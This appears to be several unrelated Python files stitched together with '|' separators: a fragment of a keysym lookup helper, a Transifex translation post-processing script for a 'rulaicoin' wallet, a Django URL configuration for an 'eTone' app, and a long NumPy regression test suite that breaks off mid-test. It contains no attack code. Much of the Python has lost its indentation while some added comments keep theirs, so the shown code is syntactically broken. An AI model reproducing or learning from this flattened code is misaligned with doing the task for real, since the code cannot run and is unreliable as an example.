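# name. The helper name below is hypothetical.
def _name_for_char(char):
    """Return the keysym name for a character, or None if it is unmapped."""
    return CHARS.get(char)

# _name_for_char(u'\u00E9') == 'eacute'   (see the 'eacute' entry above)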
|
#!/usr/bin/python
# Copyright (c) 2014 Wladimir J. van der Laan
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Run this script from the root of the repository to update all translations from
transifex.
It will do the following automatically:
- fetch all translations using the tx tool
- post-process them into valid and committable format
- remove invalid control characters
- remove location tags (makes diffs less noisy)
TODO:
- auto-add new translations to the build system according to the translation process
'''
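# Example invocation (illustrative only; use whatever path/name this script is
# saved under in the repository):
#   cd /path/to/repo && python update-translations.py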
from __future__ import division, print_function
import subprocess
import re
import sys
import os
import io
import xml.etree.ElementTree as ET
# Name of transifex tool
TX = 'tx'
# Name of source language file
SOURCE_LANG = 'rulaicoin_en.ts'
# Directory with locale files
LOCALE_DIR = 'src/qt/locale'
# Minimum number of messages for translation to be considered at all
MIN_NUM_MESSAGES = 10
def check_at_repository_root():
if not os.path.exists('.git'):
print('No .git directory found')
print('Execute this script at the root of the repository', file=sys.stderr)
exit(1)
def fetch_all_translations():
if subprocess.call([TX, 'pull', '-f', '-a']):
print('Error while fetching translations', file=sys.stderr)
exit(1)
def find_format_specifiers(s):
'''Find all format specifiers in a string.'''
pos = 0
specifiers = []
while True:
percent = s.find('%', pos)
if percent < 0:
break
        # A trailing '%' with no specifier raises IndexError here; let it
        # propagate so check_format_specifiers() can report a parse error.
        specifiers.append(s[percent+1])
        pos = percent+2
return specifiers
def split_format_specifiers(specifiers):
'''Split format specifiers between numeric (Qt) and others (strprintf)'''
numeric = []
other = []
for s in specifiers:
if s in {'1','2','3','4','5','6','7','8','9'}:
numeric.append(s)
else:
other.append(s)
# numeric (Qt) can be present in any order, others (strprintf) must be in specified order
return set(numeric),other
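# Worked example for the two helpers above (illustrative, not part of the
# original script): numeric Qt-style specifiers are collected into a set,
# strprintf-style ones keep their order.
#   find_format_specifiers('%1 of %2 (%s)')   -> ['1', '2', 's']
#   split_format_specifiers(['1', '2', 's'])  -> ({'1', '2'}, ['s'])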
def sanitize_string(s):
'''Sanitize string for printing'''
return s.replace('\n',' ')
def check_format_specifiers(source, translation, errors, numerus):
source_f = split_format_specifiers(find_format_specifiers(source))
# assert that no source messages contain both Qt and strprintf format specifiers
# if this fails, go change the source as this is hacky and confusing!
#assert(not(source_f[0] and source_f[1]))
try:
translation_f = split_format_specifiers(find_format_specifiers(translation))
except IndexError:
errors.append("Parse error in translation for '%s': '%s'" % (sanitize_string(source), sanitize_string(translation)))
return False
else:
if source_f != translation_f:
if numerus and source_f == (set(), ['n']) and translation_f == (set(), []) and translation.find('%') == -1:
# Allow numerus translations to omit %n specifier (usually when it only has one possible value)
return True
errors.append("Mismatch between '%s' and '%s'" % (sanitize_string(source), sanitize_string(translation)))
return False
return True
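# Behaviour sketch for check_format_specifiers (illustrative inputs, not part
# of the original script):
#   check_format_specifiers('%1 of %2', '%2 of %1', [], False)   -> True
#       (numeric Qt specifiers may be reordered)
#   check_format_specifiers('%s items', '%d items', errs, False) -> False
#       (the mismatch is appended to errs)
#   check_format_specifiers('%n minutes', 'minuty', [], True)    -> True
#       (numerus translations may omit %n entirely)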
def all_ts_files(suffix=''):
for filename in os.listdir(LOCALE_DIR):
# process only language files, and do not process source language
if not filename.endswith('.ts'+suffix) or filename == SOURCE_LANG+suffix:
continue
if suffix: # remove provided suffix
filename = filename[0:-len(suffix)]
filepath = os.path.join(LOCALE_DIR, filename)
yield(filename, filepath)
FIX_RE = re.compile(b'[\x00-\x09\x0b\x0c\x0e-\x1f]')
def remove_invalid_characters(s):
'''Remove invalid characters from translation string'''
return FIX_RE.sub(b'', s)
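# For example (illustrative only), stray control bytes are dropped before the
# XML parser sees the data:
#   remove_invalid_characters(b'foo\x08bar\x1fbaz') == b'foobarbaz'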
# Override cdata escape function to make our output match Qt's (optional, just for cleaner diffs for
# comparison, disabled by default)
_orig_escape_cdata = None
def escape_cdata(text):
text = _orig_escape_cdata(text)
    text = text.replace("'", '&apos;')
    text = text.replace('"', '&quot;')
return text
def postprocess_translations(reduce_diff_hacks=False):
print('Checking and postprocessing...')
if reduce_diff_hacks:
global _orig_escape_cdata
_orig_escape_cdata = ET._escape_cdata
ET._escape_cdata = escape_cdata
for (filename,filepath) in all_ts_files():
os.rename(filepath, filepath+'.orig')
have_errors = False
for (filename,filepath) in all_ts_files('.orig'):
# pre-fixups to cope with transifex output
        parser = ET.XMLParser(encoding='utf-8') # need to override encoding because 'utf8' is not understood, only 'utf-8'
with open(filepath + '.orig', 'rb') as f:
data = f.read()
# remove control characters; this must be done over the entire file otherwise the XML parser will fail
data = remove_invalid_characters(data)
tree = ET.parse(io.BytesIO(data), parser=parser)
# iterate over all messages in file
root = tree.getroot()
for context in root.findall('context'):
for message in context.findall('message'):
numerus = message.get('numerus') == 'yes'
source = message.find('source').text
translation_node = message.find('translation')
# pick all numerusforms
if numerus:
translations = [i.text for i in translation_node.findall('numerusform')]
else:
translations = [translation_node.text]
for translation in translations:
if translation is None:
continue
errors = []
valid = check_format_specifiers(source, translation, errors, numerus)
for error in errors:
print('%s: %s' % (filename, error))
if not valid: # set type to unfinished and clear string if invalid
translation_node.clear()
translation_node.set('type', 'unfinished')
have_errors = True
# Remove location tags
for location in message.findall('location'):
message.remove(location)
# Remove entire message if it is an unfinished translation
if translation_node.get('type') == 'unfinished':
context.remove(message)
# check if document is (virtually) empty, and remove it if so
num_messages = 0
for context in root.findall('context'):
for message in context.findall('message'):
num_messages += 1
if num_messages < MIN_NUM_MESSAGES:
print('Removing %s, as it contains only %i messages' % (filepath, num_messages))
continue
# write fixed-up tree
# if diff reduction requested, replace some XML to 'sanitize' to qt formatting
if reduce_diff_hacks:
out = io.BytesIO()
tree.write(out, encoding='utf-8')
out = out.getvalue()
out = out.replace(b' />', b'/>')
with open(filepath, 'wb') as f:
f.write(out)
else:
tree.write(filepath, encoding='utf-8')
return have_errors
if __name__ == '__main__':
check_at_repository_root()
# fetch_all_translations()
postprocess_translations()
|
from django.urls import re_path
from django.conf.urls.static import static
from django.conf import settings
from django.contrib import admin
from django.contrib.auth import views as auth_views
from django.views.generic.base import TemplateView
from eTone import views as eTone_views
urlpatterns = [
re_path(r'^admin/', admin.site.urls),
re_path(r'^$', TemplateView.as_view(template_name='home.html'), name='home'),
    re_path(r'^login/$', auth_views.LoginView.as_view(template_name='login.html'), name='login'),
    re_path(r'^logout/$', auth_views.LogoutView.as_view(template_name='logout.html'), name='logout'),
re_path(r'^signup/$', eTone_views.signup, name='signup'),
re_path(r'^upload/$', eTone_views.upload_file, name='upload'),
re_path(r'^game/$', eTone_views.select_sound_game, name='game'),
re_path(r'^stats/$', eTone_views.get_stats, name='stats'),
re_path(r'^api/upload/(?P<typeID>[^/]?)/(?P<filename>[^/]+)$', eTone_views.FileUploadView.as_view())
]
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
from __future__ import division, absolute_import, print_function
import copy
import pickle
import sys
import platform
import gc
import warnings
import tempfile
from os import path
from io import BytesIO
from itertools import chain
import numpy as np
from numpy.testing import (
run_module_suite, TestCase, assert_, assert_equal,
assert_almost_equal, assert_array_equal, assert_array_almost_equal,
assert_raises, assert_warns, dec
)
from numpy.testing.utils import _assert_valid_refcount
from numpy.compat import asbytes, asunicode, asbytes_nested, long, sixu
rlevel = 1
class TestRegression(TestCase):
def test_invalid_round(self,level=rlevel):
# Ticket #3
v = 4.7599999999999998
assert_array_equal(np.array([v]), np.array(v))
def test_mem_empty(self,level=rlevel):
# Ticket #7
np.empty((1,), dtype=[('x', np.int64)])
def test_pickle_transposed(self,level=rlevel):
# Ticket #16
a = np.transpose(np.array([[2, 9], [7, 0], [3, 8]]))
f = BytesIO()
pickle.dump(a, f)
f.seek(0)
b = pickle.load(f)
f.close()
assert_array_equal(a, b)
def test_typeNA(self,level=rlevel):
# Ticket #31
assert_equal(np.typeNA[np.int64], 'Int64')
assert_equal(np.typeNA[np.uint64], 'UInt64')
def test_dtype_names(self,level=rlevel):
# Ticket #35
# Should succeed
np.dtype([(('name', 'label'), np.int32, 3)])
def test_reduce(self,level=rlevel):
# Ticket #40
assert_almost_equal(np.add.reduce([1., .5], dtype=None), 1.5)
def test_zeros_order(self,level=rlevel):
# Ticket #43
np.zeros([3], int, 'C')
np.zeros([3], order='C')
np.zeros([3], int, order='C')
def test_asarray_with_order(self,level=rlevel):
# Check that nothing is done when order='F' and array C/F-contiguous
a = np.ones(2)
assert_(a is np.asarray(a, order='F'))
def test_ravel_with_order(self,level=rlevel):
# Check that ravel works when order='F' and array C/F-contiguous
a = np.ones(2)
assert_(not a.ravel('F').flags.owndata)
def test_sort_bigendian(self,level=rlevel):
# Ticket #47
a = np.linspace(0, 10, 11)
c = a.astype(np.dtype('<f8'))
c.sort()
assert_array_almost_equal(c, a)
def test_negative_nd_indexing(self,level=rlevel):
# Ticket #49
c = np.arange(125).reshape((5, 5, 5))
origidx = np.array([-1, 0, 1])
idx = np.array(origidx)
c[idx]
assert_array_equal(idx, origidx)
def test_char_dump(self,level=rlevel):
# Ticket #50
f = BytesIO()
ca = np.char.array(np.arange(1000, 1010), itemsize=4)
ca.dump(f)
f.seek(0)
ca = np.load(f)
f.close()
def test_noncontiguous_fill(self,level=rlevel):
# Ticket #58.
a = np.zeros((5, 3))
b = a[:, :2,]
def rs():
b.shape = (10,)
self.assertRaises(AttributeError, rs)
def test_bool(self,level=rlevel):
# Ticket #60
np.bool_(1) # Should succeed
def test_indexing1(self,level=rlevel):
# Ticket #64
descr = [('x', [('y', [('z', 'c16', (2,)),]),]),]
buffer = ((([6j, 4j],),),)
h = np.array(buffer, dtype=descr)
h['x']['y']['z']
def test_indexing2(self,level=rlevel):
# Ticket #65
descr = [('x', 'i4', (2,))]
buffer = ([3, 2],)
h = np.array(buffer, dtype=descr)
h['x']
def test_round(self,level=rlevel):
# Ticket #67
x = np.array([1+2j])
assert_almost_equal(x**(-1), [1/(1+2j)])
def test_scalar_compare(self,level=rlevel):
# Trac Ticket #72
# https://github.com/numpy/numpy/issues/565
a = np.array(['test', 'auto'])
assert_array_equal(a == 'auto', np.array([False, True]))
self.assertTrue(a[1] == 'auto')
self.assertTrue(a[0] != 'auto')
b = np.linspace(0, 10, 11)
# This should return true for now, but will eventually raise an error:
with warnings.catch_warnings():
warnings.filterwarnings("ignore", category=DeprecationWarning)
self.assertTrue(b != 'auto')
self.assertTrue(b[0] != 'auto')
def test_unicode_swapping(self,level=rlevel):
# Ticket #79
ulen = 1
ucs_value = sixu('\U0010FFFF')
ua = np.array([[[ucs_value*ulen]*2]*3]*4, dtype='U%s' % ulen)
ua.newbyteorder() # Should succeed.
def test_object_array_fill(self,level=rlevel):
# Ticket #86
x = np.zeros(1, 'O')
x.fill([])
def test_mem_dtype_align(self,level=rlevel):
# Ticket #93
self.assertRaises(TypeError, np.dtype,
{'names':['a'],'formats':['foo']}, align=1)
@dec.knownfailureif((sys.version_info[0] >= 3) or
(sys.platform == "win32" and
platform.architecture()[0] == "64bit"),
"numpy.intp('0xff', 16) not supported on Py3, "
"as it does not inherit from Python int")
def test_intp(self,level=rlevel):
# Ticket #99
i_width = np.int_(0).nbytes*2 - 1
np.intp('0x' + 'f'*i_width, 16)
self.assertRaises(OverflowError, np.intp, '0x' + 'f'*(i_width+1), 16)
self.assertRaises(ValueError, np.intp, '0x1', 32)
assert_equal(255, np.intp('0xFF', 16))
assert_equal(1024, np.intp(1024))
def test_endian_bool_indexing(self,level=rlevel):
# Ticket #105
a = np.arange(10., dtype='>f8')
b = np.arange(10., dtype='<f8')
xa = np.where((a > 2) & (a < 6))
xb = np.where((b > 2) & (b < 6))
ya = ((a > 2) & (a < 6))
yb = ((b > 2) & (b < 6))
assert_array_almost_equal(xa, ya.nonzero())
assert_array_almost_equal(xb, yb.nonzero())
assert_(np.all(a[ya] > 0.5))
assert_(np.all(b[yb] > 0.5))
def test_endian_where(self,level=rlevel):
# GitHub issue #369
net = np.zeros(3, dtype='>f4')
net[1] = 0.00458849
net[2] = 0.605202
max_net = net.max()
test = np.where(net <= 0., max_net, net)
correct = np.array([ 0.60520202, 0.00458849, 0.60520202])
assert_array_almost_equal(test, correct)
def test_endian_recarray(self,level=rlevel):
# Ticket #2185
dt = np.dtype([
('head', '>u4'),
('data', '>u4', 2),
])
buf = np.recarray(1, dtype=dt)
buf[0]['head'] = 1
buf[0]['data'][:] = [1, 1]
h = buf[0]['head']
d = buf[0]['data'][0]
buf[0]['head'] = h
buf[0]['data'][0] = d
assert_(buf[0]['head'] == 1)
def test_mem_dot(self,level=rlevel):
# Ticket #106
x = np.random.randn(0, 1)
y = np.random.randn(10, 1)
# Dummy array to detect bad memory access:
_z = np.ones(10)
_dummy = np.empty((0, 10))
z = np.lib.stride_tricks.as_strided(_z, _dummy.shape, _dummy.strides)
np.dot(x, np.transpose(y), out=z)
assert_equal(_z, np.ones(10))
# Do the same for the built-in dot:
np.core.multiarray.dot(x, np.transpose(y), out=z)
assert_equal(_z, np.ones(10))
def test_arange_endian(self,level=rlevel):
# Ticket #111
ref = np.arange(10)
x = np.arange(10, dtype='<f8')
assert_array_equal(ref, x)
x = np.arange(10, dtype='>f8')
assert_array_equal(ref, x)
def test_argmax(self,level=rlevel):
# Ticket #119
a = np.random.normal(0, 1, (4, 5, 6, 7, 8))
for i in range(a.ndim):
a.argmax(i) # Should succeed
def test_mem_divmod(self,level=rlevel):
# Ticket #126
for i in range(10):
divmod(np.array([i])[0], 10)
def test_hstack_invalid_dims(self,level=rlevel):
# Ticket #128
x = np.arange(9).reshape((3, 3))
y = np.array([0, 0, 0])
self.assertRaises(ValueError, np.hstack, (x, y))
def test_squeeze_type(self,level=rlevel):
# Ticket #133
a = np.array([3])
b = np.array(3)
assert_(type(a.squeeze()) is np.ndarray)
assert_(type(b.squeeze()) is np.ndarray)
def test_add_identity(self,level=rlevel):
# Ticket #143
assert_equal(0, np.add.identity)
def test_numpy_float_python_long_addition(self):
# Check that numpy float and python longs can be added correctly.
a = np.float_(23.) + 2**135
assert_equal(a, 23. + 2**135)
def test_binary_repr_0(self,level=rlevel):
# Ticket #151
assert_equal('0', np.binary_repr(0))
def test_rec_iterate(self,level=rlevel):
# Ticket #160
descr = np.dtype([('i', int), ('f', float), ('s', '|S3')])
x = np.rec.array([(1, 1.1, '1.0'),
(2, 2.2, '2.0')], dtype=descr)
x[0].tolist()
[i for i in x[0]]
def test_unicode_string_comparison(self,level=rlevel):
# Ticket #190
a = np.array('hello', np.unicode_)
b = np.array('world')
a == b
def test_tobytes_FORTRANORDER_discontiguous(self,level=rlevel):
# Fix in r2836
# Create non-contiguous Fortran ordered array
x = np.array(np.random.rand(3, 3), order='F')[:, :2]
assert_array_almost_equal(x.ravel(), np.fromstring(x.tobytes()))
def test_flat_assignment(self,level=rlevel):
# Correct behaviour of ticket #194
x = np.empty((3, 1))
x.flat = np.arange(3)
assert_array_almost_equal(x, [[0], [1], [2]])
x.flat = np.arange(3, dtype=float)
assert_array_almost_equal(x, [[0], [1], [2]])
def test_broadcast_flat_assignment(self,level=rlevel):
# Ticket #194
x = np.empty((3, 1))
def bfa():
x[:] = np.arange(3)
def bfb():
x[:] = np.arange(3, dtype=float)
self.assertRaises(ValueError, bfa)
self.assertRaises(ValueError, bfb)
def test_nonarray_assignment(self):
# See also Issue gh-2870, test for non-array assignment
# and equivalent unsafe casted array assignment
a = np.arange(10)
b = np.ones(10, dtype=bool)
r = np.arange(10)
def assign(a, b, c):
a[b] = c
assert_raises(ValueError, assign, a, b, np.nan)
a[b] = np.array(np.nan) # but not this.
assert_raises(ValueError, assign, a, r, np.nan)
a[r] = np.array(np.nan)
def test_unpickle_dtype_with_object(self,level=rlevel):
# Implemented in r2840
dt = np.dtype([('x', int), ('y', np.object_), ('z', 'O')])
f = BytesIO()
pickle.dump(dt, f)
f.seek(0)
dt_ = pickle.load(f)
f.close()
assert_equal(dt, dt_)
def test_mem_array_creation_invalid_specification(self,level=rlevel):
# Ticket #196
dt = np.dtype([('x', int), ('y', np.object_)])
# Wrong way
self.assertRaises(ValueError, np.array, [1, 'object'], dt)
# Correct way
np.array([(1, 'object')], dt)
def test_recarray_single_element(self,level=rlevel):
# Ticket #202
a = np.array([1, 2, 3], dtype=np.int32)
b = a.copy()
r = np.rec.array(a, shape=1, formats=['3i4'], names=['d'])
assert_array_equal(a, b)
assert_equal(a, r[0][0])
def test_zero_sized_array_indexing(self,level=rlevel):
# Ticket #205
tmp = np.array([])
def index_tmp():
tmp[np.array(10)]
self.assertRaises(IndexError, index_tmp)
def test_chararray_rstrip(self,level=rlevel):
# Ticket #222
x = np.chararray((1,), 5)
x[0] = asbytes('a ')
x = x.rstrip()
assert_equal(x[0], asbytes('a'))
def test_object_array_shape(self,level=rlevel):
# Ticket #239
assert_equal(np.array([[1, 2], 3, 4], dtype=object).shape, (3,))
assert_equal(np.array([[1, 2], [3, 4]], dtype=object).shape, (2, 2))
assert_equal(np.array([(1, 2), (3, 4)], dtype=object).shape, (2, 2))
assert_equal(np.array([], dtype=object).shape, (0,))
assert_equal(np.array([[], [], []], dtype=object).shape, (3, 0))
assert_equal(np.array([[3, 4], [5, 6], None], dtype=object).shape, (3,))
def test_mem_around(self,level=rlevel):
# Ticket #243
x = np.zeros((1,))
y = [0]
decimal = 6
np.around(abs(x-y), decimal) <= 10.0**(-decimal)
def test_character_array_strip(self,level=rlevel):
# Ticket #246
x = np.char.array(("x", "x ", "x "))
for c in x:
assert_equal(c, "x")
def test_lexsort(self,level=rlevel):
# Lexsort memory error
v = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10])
assert_equal(np.lexsort(v), 0)
def test_lexsort_invalid_sequence(self):
# Issue gh-4123
class BuggySequence(object):
def __len__(self):
return 4
def __getitem__(self, key):
raise KeyError
assert_raises(KeyError, np.lexsort, BuggySequence())
def test_pickle_py2_bytes_encoding(self):
# Check that arrays and scalars pickled on Py2 are
# unpickleable on Py3 using encoding='bytes'
test_data = [
# (original, py2_pickle)
(np.unicode_('\u6f2c'),
asbytes("cnumpy.core.multiarray\nscalar\np0\n(cnumpy\ndtype\np1\n"
"(S'U1'\np2\nI0\nI1\ntp3\nRp4\n(I3\nS'<'\np5\nNNNI4\nI4\n"
"I0\ntp6\nbS',o\\x00\\x00'\np7\ntp8\nRp9\n.")),
(np.array([9e123], dtype=np.float64),
asbytes("cnumpy.core.multiarray\n_reconstruct\np0\n(cnumpy\nndarray\n"
"p1\n(I0\ntp2\nS'b'\np3\ntp4\nRp5\n(I1\n(I1\ntp6\ncnumpy\ndtype\n"
"p7\n(S'f8'\np8\nI0\nI1\ntp9\nRp10\n(I3\nS'<'\np11\nNNNI-1\nI-1\n"
"I0\ntp12\nbI00\nS'O\\x81\\xb7Z\\xaa:\\xabY'\np13\ntp14\nb.")),
(np.array([(9e123,)], dtype=[('name', float)]),
asbytes("cnumpy.core.multiarray\n_reconstruct\np0\n(cnumpy\nndarray\np1\n"
"(I0\ntp2\nS'b'\np3\ntp4\nRp5\n(I1\n(I1\ntp6\ncnumpy\ndtype\np7\n"
"(S'V8'\np8\nI0\nI1\ntp9\nRp10\n(I3\nS'|'\np11\nN(S'name'\np12\ntp13\n"
"(dp14\ng12\n(g7\n(S'f8'\np15\nI0\nI1\ntp16\nRp17\n(I3\nS'<'\np18\nNNNI-1\n"
"I-1\nI0\ntp19\nbI0\ntp20\nsI8\nI1\nI0\ntp21\n"
"bI00\nS'O\\x81\\xb7Z\\xaa:\\xabY'\np22\ntp23\nb.")),
]
if sys.version_info[:2] >= (3, 4):
# encoding='bytes' was added in Py3.4
for original, data in test_data:
result = pickle.loads(data, encoding='bytes')
assert_equal(result, original)
if isinstance(result, np.ndarray) and result.dtype.names:
for name in result.dtype.names:
assert_(isinstance(name, str))
def test_pickle_dtype(self,level=rlevel):
# Ticket #251
pickle.dumps(np.float)
def test_swap_real(self, level=rlevel):
# Ticket #265
assert_equal(np.arange(4, dtype='>c8').imag.max(), 0.0)
assert_equal(np.arange(4, dtype='<c8').imag.max(), 0.0)
assert_equal(np.arange(4, dtype='>c8').real.max(), 3.0)
assert_equal(np.arange(4, dtype='<c8').real.max(), 3.0)
def test_object_array_from_list(self, level=rlevel):
# Ticket #270
np.array([1, 'A', None]) # Should succeed
def test_multiple_assign(self, level=rlevel):
# Ticket #273
a = np.zeros((3, 1), int)
a[[1, 2]] = 1
def test_empty_array_type(self, level=rlevel):
assert_equal(np.array([]).dtype, np.zeros(0).dtype)
def test_void_copyswap(self, level=rlevel):
dt = np.dtype([('one', '<i4'), ('two', '<i4')])
x = np.array((1, 2), dtype=dt)
x = x.byteswap()
assert_(x['one'] > 1 and x['two'] > 2)
def test_method_args(self, level=rlevel):
# Make sure methods and functions have same default axis
# keyword and arguments
funcs1 = ['argmax', 'argmin', 'sum', ('product', 'prod'),
('sometrue', 'any'),
('alltrue', 'all'), 'cumsum', ('cumproduct', 'cumprod'),
'ptp', 'cumprod', 'prod', 'std', 'var', 'mean',
'round', 'min', 'max', 'argsort', 'sort']
funcs2 = ['compress', 'take', 'repeat']
for func in funcs1:
arr = np.random.rand(8, 7)
arr2 = arr.copy()
if isinstance(func, tuple):
func_meth = func[1]
func = func[0]
else:
func_meth = func
res1 = getattr(arr, func_meth)()
res2 = getattr(np, func)(arr2)
if res1 is None:
res1 = arr
if res1.dtype.kind in 'uib':
assert_((res1 == res2).all(), func)
else:
assert_(abs(res1-res2).max() < 1e-8, func)
for func in funcs2:
arr1 = np.random.rand(8, 7)
arr2 = np.random.rand(8, 7)
res1 = None
if func == 'compress':
arr1 = arr1.ravel()
res1 = getattr(arr2, func)(arr1)
else:
arr2 = (15*arr2).astype(int).ravel()
if res1 is None:
res1 = getattr(arr1, func)(arr2)
res2 = getattr(np, func)(arr1, arr2)
assert_(abs(res1-res2).max() < 1e-8, func)
def test_mem_lexsort_strings(self, level=rlevel):
# Ticket #298
lst = ['abc', 'cde', 'fgh']
np.lexsort((lst,))
def test_fancy_index(self, level=rlevel):
# Ticket #302
x = np.array([1, 2])[np.array([0])]
assert_equal(x.shape, (1,))
def test_recarray_copy(self, level=rlevel):
# Ticket #312
dt = [('x', np.int16), ('y', np.float64)]
ra = np.array([(1, 2.3)], dtype=dt)
rb = np.rec.array(ra, dtype=dt)
rb['x'] = 2.
assert_(ra['x'] != rb['x'])
def test_rec_fromarray(self, level=rlevel):
# Ticket #322
x1 = np.array([[1, 2], [3, 4], [5, 6]])
x2 = np.array(['a', 'dd', 'xyz'])
x3 = np.array([1.1, 2, 3])
np.rec.fromarrays([x1, x2, x3], formats="(2,)i4,a3,f8")
def test_object_array_assign(self, level=rlevel):
x = np.empty((2, 2), object)
x.flat[2] = (1, 2, 3)
assert_equal(x.flat[2], (1, 2, 3))
def test_ndmin_float64(self, level=rlevel):
# Ticket #324
x = np.array([1, 2, 3], dtype=np.float64)
assert_equal(np.array(x, dtype=np.float32, ndmin=2).ndim, 2)
assert_equal(np.array(x, dtype=np.float64, ndmin=2).ndim, 2)
def test_ndmin_order(self, level=rlevel):
# Issue #465 and related checks
assert_(np.array([1, 2], order='C', ndmin=3).flags.c_contiguous)
assert_(np.array([1, 2], order='F', ndmin=3).flags.f_contiguous)
assert_(np.array(np.ones((2, 2), order='F'), ndmin=3).flags.f_contiguous)
assert_(np.array(np.ones((2, 2), order='C'), ndmin=3).flags.c_contiguous)
def test_mem_axis_minimization(self, level=rlevel):
# Ticket #327
data = np.arange(5)
data = np.add.outer(data, data)
def test_mem_float_imag(self, level=rlevel):
# Ticket #330
np.float64(1.0).imag
def test_dtype_tuple(self, level=rlevel):
# Ticket #334
assert_(np.dtype('i4') == np.dtype(('i4', ())))
def test_dtype_posttuple(self, level=rlevel):
# Ticket #335
np.dtype([('col1', '()i4')])
def test_numeric_carray_compare(self, level=rlevel):
# Ticket #341
assert_equal(np.array(['X'], 'c'), asbytes('X'))
def test_string_array_size(self, level=rlevel):
# Ticket #342
self.assertRaises(ValueError,
np.array, [['X'], ['X', 'X', 'X']], '|S1')
def test_dtype_repr(self, level=rlevel):
# Ticket #344
dt1 = np.dtype(('uint32', 2))
dt2 = np.dtype(('uint32', (2,)))
assert_equal(dt1.__repr__(), dt2.__repr__())
def test_reshape_order(self, level=rlevel):
# Make sure reshape order works.
a = np.arange(6).reshape(2, 3, order='F')
assert_equal(a, [[0, 2, 4], [1, 3, 5]])
a = np.array([[1, 2], [3, 4], [5, 6], [7, 8]])
b = a[:, 1]
assert_equal(b.reshape(2, 2, order='F'), [[2, 6], [4, 8]])
def test_reshape_zero_strides(self, level=rlevel):
# Issue #380, test reshaping of zero strided arrays
a = np.ones(1)
a = np.lib.stride_tricks.as_strided(a, shape=(5,), strides=(0,))
assert_(a.reshape(5, 1).strides[0] == 0)
def test_reshape_zero_size(self, level=rlevel):
# GitHub Issue #2700, setting shape failed for 0-sized arrays
a = np.ones((0, 2))
a.shape = (-1, 2)
# Cannot test if NPY_RELAXED_STRIDES_CHECKING changes the strides.
# With NPY_RELAXED_STRIDES_CHECKING the test becomes superfluous.
@dec.skipif(np.ones(1).strides[0] == np.iinfo(np.intp).max)
def test_reshape_trailing_ones_strides(self):
# GitHub issue gh-2949, bad strides for trailing ones of new shape
a = np.zeros(12, dtype=np.int32)[::2] # not contiguous
strides_c = (16, 8, 8, 8)
strides_f = (8, 24, 48, 48)
assert_equal(a.reshape(3, 2, 1, 1).strides, strides_c)
assert_equal(a.reshape(3, 2, 1, 1, order='F').strides, strides_f)
assert_equal(np.array(0, dtype=np.int32).reshape(1, 1).strides, (4, 4))
def test_repeat_discont(self, level=rlevel):
# Ticket #352
a = np.arange(12).reshape(4, 3)[:, 2]
assert_equal(a.repeat(3), [2, 2, 2, 5, 5, 5, 8, 8, 8, 11, 11, 11])
def test_array_index(self, level=rlevel):
# Make sure optimization is not called in this case.
a = np.array([1, 2, 3])
a2 = np.array([[1, 2, 3]])
assert_equal(a[np.where(a == 3)], a2[np.where(a2 == 3)])
def test_object_argmax(self, level=rlevel):
a = np.array([1, 2, 3], dtype=object)
assert_(a.argmax() == 2)
def test_recarray_fields(self, level=rlevel):
# Ticket #372
dt0 = np.dtype([('f0', 'i4'), ('f1', 'i4')])
dt1 = np.dtype([('f0', 'i8'), ('f1', 'i8')])
for a in [np.array([(1, 2), (3, 4)], "i4,i4"),
np.rec.array([(1, 2), (3, 4)], "i4,i4"),
np.rec.array([(1, 2), (3, 4)]),
np.rec.fromarrays([(1, 2), (3, 4)], "i4,i4"),
np.rec.fromarrays([(1, 2), (3, 4)])]:
assert_(a.dtype in [dt0, dt1])
def test_random_shuffle(self, level=rlevel):
# Ticket #374
a = np.arange(5).reshape((5, 1))
b = a.copy()
np.random.shuffle(b)
assert_equal(np.sort(b, axis=0), a)
def test_refcount_vdot(self, level=rlevel):
# Changeset #3443
_assert_valid_refcount(np.vdot)
def test_startswith(self, level=rlevel):
ca = np.char.array(['Hi', 'There'])
assert_equal(ca.startswith('H'), [True, False])
def test_noncommutative_reduce_accumulate(self, level=rlevel):
# Ticket #413
tosubtract = np.arange(5)
todivide = np.array([2.0, 0.5, 0.25])
assert_equal(np.subtract.reduce(tosubtract), -10)
assert_equal(np.divide.reduce(todivide), 16.0)
assert_array_equal(np.subtract.accumulate(tosubtract),
np.array([0, -1, -3, -6, -10]))
assert_array_equal(np.divide.accumulate(todivide),
np.array([2., 4., 16.]))
def test_convolve_empty(self, level=rlevel):
# Convolve should raise an error for empty input array.
self.assertRaises(ValueError, np.convolve, [], [1])
self.assertRaises(ValueError, np.convolve, [1], [])
def test_multidim_byteswap(self, level=rlevel):
# Ticket #449
r = np.array([(1, (0, 1, 2))], dtype="i2,3i2")
assert_array_equal(r.byteswap(),
np.array([(256, (0, 256, 512))], r.dtype))
def test_string_NULL(self, level=rlevel):
# Changeset 3557
assert_equal(np.array("a\x00\x0b\x0c\x00").item(),
'a\x00\x0b\x0c')
def test_junk_in_string_fields_of_recarray(self, level=rlevel):
# Ticket #483
r = np.array([[asbytes('abc')]], dtype=[('var1', '|S20')])
assert_(asbytes(r['var1'][0][0]) == asbytes('abc'))
def test_take_output(self, level=rlevel):
# Ensure that 'take' honours output parameter.
x = np.arange(12).reshape((3, 4))
a = np.take(x, [0, 2], axis=1)
b = np.zeros_like(a)
np.take(x, [0, 2], axis=1, out=b)
assert_array_equal(a, b)
def test_take_object_fail(self):
# Issue gh-3001
d = 123.
a = np.array([d, 1], dtype=object)
ref_d = sys.getrefcount(d)
try:
a.take([0, 100])
except IndexError:
pass
assert_(ref_d == sys.getrefcount(d))
def test_array_str_64bit(self, level=rlevel):
# Ticket #501
s = np.array([1, np.nan], dtype=np.float64)
with np.errstate(all='raise'):
np.array_str(s) # Should succeed
def test_frompyfunc_endian(self, level=rlevel):
# Ticket #503
from math import radians
uradians = np.frompyfunc(radians, 1, 1)
big_endian = np.array([83.4, 83.5], dtype='>f8')
little_endian = np.array([83.4, 83.5], dtype='<f8')
assert_almost_equal(uradians(big_endian).astype(float),
uradians(little_endian).astype(float))
def test_mem_string_arr(self, level=rlevel):
# Ticket #514
s = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
t = []
np.hstack((t, s))
def test_arr_transpose(self, level=rlevel):
# Ticket #516
x = np.random.rand(*(2,)*16)
x.transpose(list(range(16))) # Should succeed
def test_string_mergesort(self, level=rlevel):
# Ticket #540
x = np.array(['a']*32)
assert_array_equal(x.argsort(kind='m'), np.arange(32))
def test_argmax_byteorder(self, level=rlevel):
# Ticket #546
a = np.arange(3, dtype='>f')
